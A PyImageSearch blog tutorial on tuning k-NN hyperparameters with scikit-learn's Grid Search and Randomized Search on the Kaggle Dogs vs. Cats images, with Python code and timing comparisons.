In general, model parameters are optimized according to some loss function, while hyperparameters are instead searched for by exploring various settings to see which values provided the highest level of accuracy.

Because of this, it tends to be easier to tune model parameters (since we’re optimizing some objective function based on our training data) whereas hyperparameters can require a nearly blind search to find optimal ones.

k-NN hyperparameters

As a concrete example of tuning hyperparameters, let’s consider the k-Nearest Neighbor classification algorithm. For your standard k-NN implementation, there are two primary hyperparameters that you’ll want to tune:

  1. The number of neighbors k.
  2. The distance metric/similarity function.

Both of these values can dramatically affect the accuracy of your k-NN classifier. To demonstrate this in the context of image classification, let’s apply hyperparameter tuning to our Kaggle Dogs vs. Cats dataset from last week.

Open up a new file, name it knn_tune.py, and insert the following code:
# import the necessary packages
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import RandomizedSearchCV
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from imutils import paths
import numpy as np
import argparse
import imutils
import time
import cv2
import os

Lines 2-12 start by importing our required Python packages. We’ll be making heavy use of the scikit-learn library, so if you do not have it installed, make sure you follow these instructions.

We’ll also be using my personal imutils library, so make sure you have it installed as well:

$ pip install imutils

Next, we’ll define our extract_color_histogram function:

def extract_color_histogram(image, bins=(8, 8, 8)):
        # extract a 3D color histogram from the HSV color space using
        # the supplied number of `bins` per channel
        hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,
                [0, 180, 0, 256, 0, 256])

        # handle normalizing the histogram if we are using OpenCV 2.4.X
        if imutils.is_cv2():
                hist = cv2.normalize(hist)

        # otherwise, perform "in place" normalization in OpenCV 3 (I
        # personally hate the way this is done)
        else:
                cv2.normalize(hist, hist)

        # return the flattened histogram as the feature vector
        return hist.flatten()

This function accepts an input image along with a number of bins for each channel of the image.

We convert the image to the HSV color space and compute a 3D color histogram to characterize the color distribution of the image (Lines 17-19).

This histogram is then flattened into a single 8 x 8 x 8 = 512-d feature vector that is returned to the calling function.

For a more detailed review of this method, please refer to last week’s blog post.

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
        help="path to input dataset")
ap.add_argument("-j", "--jobs", type=int, default=-1,
        help="# of jobs for k-NN distance (-1 uses all available cores)")
args = vars(ap.parse_args())

# grab the list of images that we'll be describing
print("[INFO] describing images...")
imagePaths = list(paths.list_images(args["dataset"]))

# initialize the data matrix and labels list
data = []
labels = []

Lines 34-39 handle parsing our command line arguments. We only need two switches here:

  • --dataset : The path to our input Dogs vs. Cats dataset from the Kaggle challenge.
  • --jobs : The number of processors/cores to utilize when computing the nearest neighbors for a particular data point. Setting this value to -1 indicates all available processors/cores should be used.

Again, for a more detailed review of these arguments, please refer to last week’s tutorial.

Line 43 grabs the paths to our 25,000 input images while Lines 46 and 47 initialize the data list (where we’ll store the color histogram extracted from each image) and labels list (either “dog” or “cat” for each input image), respectively.

Next, we can loop over our imagePaths and describe them:

# loop over the input images
for (i, imagePath) in enumerate(imagePaths):
        # load the image and extract the class label (assuming that our
        # path has the format: /path/to/dataset/{class}.{image_num}.jpg)
        image = cv2.imread(imagePath)
        label = imagePath.split(os.path.sep)[-1].split(".")[0]

        # extract a color histogram from the image, then update the
        # data matrix and labels list
        hist = extract_color_histogram(image)
        data.append(hist)
        labels.append(label)

        # show an update every 1,000 images
        if i > 0 and i % 1000 == 0:
                print("[INFO] processed {}/{}".format(i, len(imagePaths)))

Line 50 starts looping over each of the imagePaths. For each imagePath, we load it from disk and extract the label (Lines 53 and 54).

Now that we have our image, we compute a color histogram (Line 58), followed by updating the data and labels lists (Lines 59 and 60).

Finally, Lines 63 and 64 display the feature extraction progress to our screen.

In order to train and evaluate our k-NN classifier, we’ll need to partition our data into two splits: a training split and a testing split:

# partition the data into training and testing splits, using 75%
# of the data for training and the remaining 25% for testing
print("[INFO] constructing training/testing split...")
(trainData, testData, trainLabels, testLabels) = train_test_split(
        data, labels, test_size=0.25, random_state=42)

Here we’ll be using 75% of our data for training and the remaining 25% for evaluation.

Finally, let’s define the set of hyperparameters we are going to optimize over:

# construct the set of hyperparameters to tune
params = {"n_neighbors": np.arange(1, 31, 2),
        "metric": ["euclidean", "cityblock"]}

The above code block defines a `params` dictionary which contains two keys:

  • `n_neighbors`: The number of nearest neighbors k in the k-NN algorithm. Here we’ll search over the odd integers in the range [1, 29] (keep in mind that the `np.arange` function excludes its stop value, so 31 itself is never tested).
  • `metric`: This is the distance function/similarity metric for k-NN. Normally this defaults to the Euclidean distance, but we could also use any function that returns a single floating point value representing how “similar” two images are. In this case, we’ll search over both the Euclidean distance and Manhattan/City block distance.

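To make the grid concrete, here is a quick sanity check (plain NumPy, nothing scikit-learn specific) of what `np.arange(1, 31, 2)` actually produces:

import numpy as np

# np.arange excludes the stop value (31), so this yields the 15 odd
# integers 1, 3, 5, ..., 29 as our candidate values of k
print(np.arange(1, 31, 2))
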
Now that we have defined the hyperparameters we want to search over, we need a method that actually applies the search. Luckily, the scikit-learn library already has two methods that can perform hyperparameter search for us: Grid Search and Randomized Search.

As we’ll find out, it’s preferable to use Randomized Search over Grid Search in nearly all circumstances.

Grid Search hyperparameters

The Grid Search tuning algorithm will methodically (and exhaustively) train and evaluate a machine learning classifier for each and every combination of hyperparameter values.

In this case, given 15 unique values of k and 2 unique values for our distance metric, a Grid Search will run 30 different experiments to determine the optimal combination.
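
To see what “each and every combination” means in practice, here is a minimal sketch (an illustration only, not what `GridSearchCV` literally runs internally) of the enumeration a Grid Search performs:

from itertools import product

import numpy as np

ks = np.arange(1, 31, 2)
metrics = ["euclidean", "cityblock"]

# a Grid Search trains and evaluates one model per (k, metric) pair
combos = list(product(ks, metrics))
print(len(combos))  # 15 * 2 = 30 experiments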

You can see how a Grid Search is performed in the following code segment:

# tune the hyperparameters via a cross-validated grid search
print("[INFO] tuning hyperparameters via grid search")
model = KNeighborsClassifier(n_jobs=args["jobs"])
grid = GridSearchCV(model, params)
start = time.time()
grid.fit(trainData, trainLabels)

# evaluate the best grid searched model on the testing data
print("[INFO] grid search took {:.2f} seconds".format(
        time.time() - start))
acc = grid.score(testData, testLabels)
print("[INFO] grid search accuracy: {:.2f}%".format(acc * 100))
print("[INFO] grid search best parameters: {}".format(
        grid.best_params_))

The primary benefit of the Grid Search algorithm is also its major drawback: because the search is exhaustive, the number of combinations to evaluate explodes as you add hyperparameters and candidate values. For example, adding a third hyperparameter with just 10 candidate values to our 30-combination grid would balloon the search to 300 experiments.

Sure, you get to evaluate each and every combination of hyperparameters, but you pay for it in computation time. And in most cases, that cost is hardly worth it.

As I explain in the “Use Randomized Search for hyperparameter tuning (in most situations)” section below, there is rarely just one set of hyperparameters that obtains the highest accuracy.

Instead, there are “hot zones” of hyperparameters that all obtain near-identical accuracy. The goal is to explore the hyperparameter space as quickly as possible and locate one of these “hot zones”. It turns out that a random search is a great way to do this.

Randomized Search hyperparameters

The Random Search approach to hyperparameter tuning will sample hyperparameters from our `params` dictionary via a random, uniform distribution. Given a set of randomly sampled parameters, a model is then trained and evaluated.

We repeat this cycle of random hyperparameter sampling and model construction/evaluation a preset number of times. You set the number of iterations based on how long you’re willing to wait: if you’re impatient and in a hurry, keep this value low; if you have the time to spend on a longer experiment, increase the number of iterations.

In either case, the goal of a Randomized Search is to explore a large region of the hyperparameter space quickly, and the best way to accomplish this is via simple random sampling. And in practice, it works quite well!
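
Conceptually, the sampling loop looks something like the sketch below; this is only an illustration (the real `RandomizedSearchCV` also handles cross-validation and bookkeeping for us), with `n_iter` standing in for the preset number of evaluations:

import random

import numpy as np

params = {"n_neighbors": np.arange(1, 31, 2),
        "metric": ["euclidean", "cityblock"]}

# draw a fixed number of random parameter settings, uniformly
n_iter = 10
for _ in range(n_iter):
        sampled = {name: random.choice(list(values))
                for (name, values) in params.items()}
        # ... a model would be trained and evaluated with `sampled` here ...
        print(sampled)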

You can find the code to perform a Randomized Search of hyperparameters for the k-NN algorithm below:

# tune the hyperparameters via a randomized search
grid = RandomizedSearchCV(model, params)
start = time.time()
grid.fit(trainData, trainLabels)

# evaluate the best randomized searched model on the testing
# data
print("[INFO] randomized search took {:.2f} seconds".format(
        time.time() - start))
acc = grid.score(testData, testLabels)
print("[INFO] grid search accuracy: {:.2f}%".format(acc * 100))
print("[INFO] randomized search best parameters: {}".format(
        grid.best_params_))
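
One knob worth knowing about: `RandomizedSearchCV` evaluates `n_iter=10` randomly sampled parameter settings by default, so the snippet above tries 10 random combinations. If you can afford a longer search, raising it looks like this (20 is just an example value):

# evaluate 20 random parameter settings instead of the default 10
grid = RandomizedSearchCV(model, params, n_iter=20)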

Hyperparameter tuning with Python and scikit-learn results

To tune the hyperparameters of our k-NN algorithm, make sure you:

  1. Download the source code to this tutorial using the “Downloads” form at the bottom of this post.
  2. Head over to the Kaggle Dogs vs. Cats competition page and download the dataset.

From there, you can execute the following command to tune the hyperparameters:

$ python knn_tune.py --dataset kaggle_dogs_vs_cats

You’ll probably want to go for a nice walk and stretch your legs while the `knn_tune.py` script executes.

On my machine, it took 19m 26s to complete, with roughly two-thirds of that time spent Grid Searching:

Figure 2: Applying a Grid Search and a Randomized Search to tune machine learning hyperparameters using Python and scikit-learn.

As you can see from the output screenshot, the Grid Search method found that k=25 and metric=’cityblock’ obtained the highest accuracy of 64.03%. However, this Grid Search took 13 minutes.

On the other hand, the Randomized Search obtained an identical accuracy of 64.03% — and it completed in under 5 minutes.

Both of these hyperparameter tuning methods improved our classification accuracy (64.03% accuracy, up from 57.58% from last week’s post) — but the Randomized Search was much more efficient.

Use Randomized Search for hyperparameter tuning (in most situations)

Unless your search space is small and can easily be enumerated, a Randomized Search will tend to be more efficient and yield better results faster.

As our experiments demonstrated, Randomized Search was able to obtain 64.03% accuracy in under 5 minutes, while an exhaustive Grid Search took a much longer 13 minutes to obtain an identical 64.03% accuracy. That’s a 202% increase in evaluation time for identical accuracy!

In general, there isn’t just one set of hyperparameters that obtains optimal results; instead, there is usually a set of them that exists towards the bottom of a concave bowl (i.e., the optimization surface).

As long as you hit just one of these parameter sets towards the bottom of the bowl, you’ll still obtain the same accuracy as if you had enumerated all possibilities along the bowl. Furthermore, applying a Randomized Search lets you explore the various regions of this bowl much faster.
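
To make that intuition concrete, here is a toy sketch with an entirely hypothetical one-dimensional accuracy surface; the only point is that a handful of random draws almost always lands on the plateau of near-identical accuracy:

import numpy as np

def accuracy(k):
        # hypothetical surface: a wide plateau of near-identical
        # accuracy centered around k = 25
        return 0.64 - 0.0001 * (k - 25) ** 2

rng = np.random.RandomState(42)
ks = rng.choice(np.arange(1, 31, 2), size=10)

# the best of just 10 random draws already sits on the plateau
print(max(accuracy(k) for k in ks))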

Overall, this will lead to faster, more efficient hyperparameter tuning in most situations.

Summary

In today’s blog post, I demonstrated how to tune the hyperparameters of machine learning algorithms using the Python programming language and the scikit-learn library.

First, I defined the difference between standard “model parameters” and the “hyperparameters” that need to be tuned.

From there, we applied two methods to tune hyperparameters:

  1. An exhaustive Grid Search
  2. A Randomized Search

Both of these hyperparameter tuning routines were then applied to the k-NN algorithm and the Kaggle Dogs vs. Cats dataset.

Each tuning algorithm obtained identical accuracy, but the Randomized Search reached it in a fraction of the time!

In general, I highly encourage you to use Randomized Search when tuning hyperparameters. You’ll often find that there is rarely just one set of hyperparameters that obtains optimal accuracy. Instead, there are “hot zones” of hyperparameters that will obtain near-identical accuracy; the goal is to explore as many of these zones as possible and land in one of them as quickly as you can.

Given no a priori knowledge of good hyperparameter choices, a Randomized Search is the best way to find reasonable hyperparameter values in a short amount of time, as it allows you to explore many areas of the optimization surface.

Anyway, I hope you enjoyed this blog post! I’ll be back next week to discuss the basics of linear classification (and the role it plays in Neural Networks and image classification).

But before you go, be sure to sign up for the PyImageSearch Newsletter using the form below to be notified when future blog posts are published!

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

The post How to tune hyperparameters with Python and scikit-learn appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2aNY1gk
via IFTTT